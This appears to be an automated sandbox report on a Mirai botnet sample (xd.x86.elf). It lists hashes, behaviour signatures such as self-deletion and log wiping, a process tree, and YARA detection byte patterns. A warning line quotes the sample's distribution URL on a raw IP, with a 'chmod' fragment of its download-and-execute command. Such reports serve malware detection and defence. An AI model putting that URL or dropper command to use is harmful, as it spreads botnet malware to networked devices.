Create Interactive Tour

Linux Analysis Report
xd.x86.elf

Overview

General Information

Sample name:	xd.x86.elf
Analysis ID:	1654972
MD5:	a68aa2179d0db1bb9cf010a4949ea024
SHA1:	702e982ff2347f14703fb12bfdc53e1946566510
SHA256:	83ebd86adf2f88f83af9762d2bb64ac37c4a78c393351549892e2ebe914dbe52
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	88
Range:	0 - 100

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Mirai

Sample deletes itself

Sample is packed with UPX

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to kill multiple processes (SIGKILL)

Deletes log files

Detected TCP or UDP traffic on non-standard ports

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "grep" command used to find patterns in files or piped streams

Executes the "kill" or "pkill" command typically used to terminate processes

HTTP GET or POST without a user agent

Reads CPU information from /sys indicative of miner or evasive malware

Sample contains only a LOAD segment without any section mappings

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1654972
Start date and time:	2025-04-02 20:52:38 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	xd.x86.elf
Detection:	MAL
Classification:	mal88.spre.troj.evad.linELF@0/16@3/0

Warnings

Connection to analysis system has been lost, crash info: Unknown
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://213.209.129.92/d/xd.arm7;chmod

Process Tree

system is lnxubuntu20

xd.x86.elf (PID: 6239, Parent: 6162, MD5: a68aa2179d0db1bb9cf010a4949ea024) Arguments: /tmp/xd.x86.elf

xd.x86.elf New Fork (PID: 6240, Parent: 6239)

xd.x86.elf New Fork (PID: 6241, Parent: 6239)

xd.x86.elf New Fork (PID: 6242, Parent: 6239)

xd.x86.elf New Fork (PID: 6243, Parent: 6242)

xd.x86.elf New Fork (PID: 6246, Parent: 6242)

xd.x86.elf New Fork (PID: 6247, Parent: 6242)

xd.x86.elf New Fork (PID: 6249, Parent: 6242)

systemd New Fork (PID: 6255, Parent: 1)

journalctl (PID: 6255, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var

systemd New Fork (PID: 6270, Parent: 1)

systemd New Fork (PID: 6272, Parent: 1)

systemd New Fork (PID: 6273, Parent: 1)

systemd New Fork (PID: 6274, Parent: 1)

systemd New Fork (PID: 6280, Parent: 1)

systemd New Fork (PID: 6313, Parent: 1)

systemd New Fork (PID: 6334, Parent: 1)

systemd New Fork (PID: 6338, Parent: 1)

systemd New Fork (PID: 6340, Parent: 1)

systemd New Fork (PID: 6342, Parent: 1)

systemd New Fork (PID: 6343, Parent: 1)

gdm3 New Fork (PID: 6346, Parent: 1320)

Default (PID: 6346, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 6347, Parent: 1320)

Default (PID: 6347, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 6348, Parent: 1320)

Default (PID: 6348, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

systemd New Fork (PID: 6349, Parent: 1860)

pulseaudio (PID: 6349, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal

systemd New Fork (PID: 6350, Parent: 1)

systemd New Fork (PID: 6352, Parent: 1)

systemd New Fork (PID: 6353, Parent: 1)

systemd New Fork (PID: 6355, Parent: 1)

systemd New Fork (PID: 6357, Parent: 1)

gpu-manager (PID: 6357, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log

gpu-manager New Fork (PID: 6358, Parent: 6357)

sh (PID: 6358, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"

sh New Fork (PID: 6359, Parent: 6358)

grep (PID: 6359, Parent: 6358, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf

gpu-manager New Fork (PID: 6360, Parent: 6357)

sh (PID: 6360, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"

sh New Fork (PID: 6361, Parent: 6360)

grep (PID: 6361, Parent: 6360, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf

gpu-manager New Fork (PID: 6362, Parent: 6357)

sh (PID: 6362, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"

sh New Fork (PID: 6363, Parent: 6362)

grep (PID: 6363, Parent: 6362, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf

gpu-manager New Fork (PID: 6364, Parent: 6357)

sh (PID: 6364, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"

sh New Fork (PID: 6365, Parent: 6364)

grep (PID: 6365, Parent: 6364, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf

gpu-manager New Fork (PID: 6366, Parent: 6357)

sh (PID: 6366, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"

sh New Fork (PID: 6367, Parent: 6366)

grep (PID: 6367, Parent: 6366, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf

gpu-manager New Fork (PID: 6368, Parent: 6357)

sh (PID: 6368, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"

sh New Fork (PID: 6369, Parent: 6368)

grep (PID: 6369, Parent: 6368, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf

gpu-manager New Fork (PID: 6370, Parent: 6357)

sh (PID: 6370, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"

sh New Fork (PID: 6371, Parent: 6370)

grep (PID: 6371, Parent: 6370, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf

gpu-manager New Fork (PID: 6372, Parent: 6357)

sh (PID: 6372, Parent: 6357, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"

sh New Fork (PID: 6373, Parent: 6372)

grep (PID: 6373, Parent: 6372, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf

systemd New Fork (PID: 6374, Parent: 1)

systemd New Fork (PID: 6375, Parent: 1)

generate-config (PID: 6375, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config

generate-config New Fork (PID: 6376, Parent: 6375)

pkill (PID: 6376, Parent: 6375, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service

systemd New Fork (PID: 6377, Parent: 1)

gdm-wait-for-drm (PID: 6377, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm

systemd (deleted) New Fork (PID: 6378, Parent: 1)

gdm3 (PID: 6378, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3

systemd (deleted) New Fork (PID: 6381, Parent: 1)

systemd (deleted) New Fork (PID: 6389, Parent: 1)

systemd (deleted) New Fork (PID: 6390, Parent: 1)

systemd (deleted) New Fork (PID: 6392, Parent: 1)

systemd (deleted) New Fork (PID: 6397, Parent: 1)

gvfsd-fuse New Fork (PID: 6398, Parent: 2038)

fusermount (PID: 6398, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs

systemd (deleted) New Fork (PID: 6403, Parent: 1)

systemd (deleted) New Fork (PID: 6404, Parent: 1)

systemd (deleted) New Fork (PID: 6405, Parent: 1)

systemd (deleted) New Fork (PID: 6406, Parent: 1)

systemd (deleted) New Fork (PID: 6407, Parent: 1)

gpu-manager (PID: 6407, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log

gpu-manager New Fork (PID: 6409, Parent: 6407)

gpu-manager New Fork (PID: 6410, Parent: 6407)

gpu-manager New Fork (PID: 6411, Parent: 6407)

gpu-manager New Fork (PID: 6412, Parent: 6407)

gpu-manager New Fork (PID: 6413, Parent: 6407)

gpu-manager New Fork (PID: 6414, Parent: 6407)

gpu-manager New Fork (PID: 6415, Parent: 6407)

gpu-manager New Fork (PID: 6416, Parent: 6407)

systemd (deleted) New Fork (PID: 6408, Parent: 1)

systemd (deleted) New Fork (PID: 6417, Parent: 1)

systemd (deleted) New Fork (PID: 6418, Parent: 1)

gpu-manager (PID: 6418, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log

gpu-manager New Fork (PID: 6419, Parent: 6418)

gpu-manager New Fork (PID: 6420, Parent: 6418)

gpu-manager New Fork (PID: 6421, Parent: 6418)

gpu-manager New Fork (PID: 6422, Parent: 6418)

gpu-manager New Fork (PID: 6423, Parent: 6418)

gpu-manager New Fork (PID: 6424, Parent: 6418)

gpu-manager New Fork (PID: 6425, Parent: 6418)

gpu-manager New Fork (PID: 6426, Parent: 6418)

systemd (deleted) New Fork (PID: 6427, Parent: 1)

systemd (deleted) New Fork (PID: 6428, Parent: 1)

gpu-manager (PID: 6428, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log

gpu-manager New Fork (PID: 6429, Parent: 6428)

gpu-manager New Fork (PID: 6430, Parent: 6428)

gpu-manager New Fork (PID: 6431, Parent: 6428)

gpu-manager New Fork (PID: 6432, Parent: 6428)

gpu-manager New Fork (PID: 6433, Parent: 6428)

gpu-manager New Fork (PID: 6434, Parent: 6428)

gpu-manager New Fork (PID: 6435, Parent: 6428)

gpu-manager New Fork (PID: 6436, Parent: 6428)

systemd (deleted) New Fork (PID: 6437, Parent: 1)

systemd (deleted) New Fork (PID: 6438, Parent: 1)

gpu-manager (PID: 6438, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log

gpu-manager New Fork (PID: 6439, Parent: 6438)

gpu-manager New Fork (PID: 6440, Parent: 6438)

gpu-manager New Fork (PID: 6441, Parent: 6438)

gpu-manager New Fork (PID: 6442, Parent: 6438)

gpu-manager New Fork (PID: 6443, Parent: 6438)

gpu-manager New Fork (PID: 6444, Parent: 6438)

gpu-manager New Fork (PID: 6445, Parent: 6438)

gpu-manager New Fork (PID: 6446, Parent: 6438)

systemd (deleted) New Fork (PID: 6447, Parent: 1)

systemd (deleted) New Fork (PID: 6448, Parent: 1)

gpu-manager (PID: 6448, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log

gpu-manager New Fork (PID: 6449, Parent: 6448)

gpu-manager New Fork (PID: 6450, Parent: 6448)

gpu-manager New Fork (PID: 6451, Parent: 6448)

gpu-manager New Fork (PID: 6452, Parent: 6448)

gpu-manager New Fork (PID: 6453, Parent: 6448)

gpu-manager New Fork (PID: 6454, Parent: 6448)

gpu-manager New Fork (PID: 6455, Parent: 6448)

gpu-manager New Fork (PID: 6456, Parent: 6448)

systemd (deleted) New Fork (PID: 6457, Parent: 1)

systemd (deleted) New Fork (PID: 6458, Parent: 1)

plymouth (PID: 6458, Parent: 1, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: /bin/plymouth quit

systemd (deleted) New Fork (PID: 6460, Parent: 1860)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
6247.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6247.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10a04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10aa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ab8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10acc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ae0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10af4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x109b4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x4f30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_aa39fb02	unknown	unknown	0xb840:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xaf22:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x22b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xeab4:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd479:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xaef2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6247.1.0000000008048000.000000000805b000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x106a0:$x1: POST /cdn-cgi/ 0x11387:$s1: LCOGQGPTGP
6249.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6249.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10a04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10aa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ab8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10acc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ae0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10af4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x109b4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x4f30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
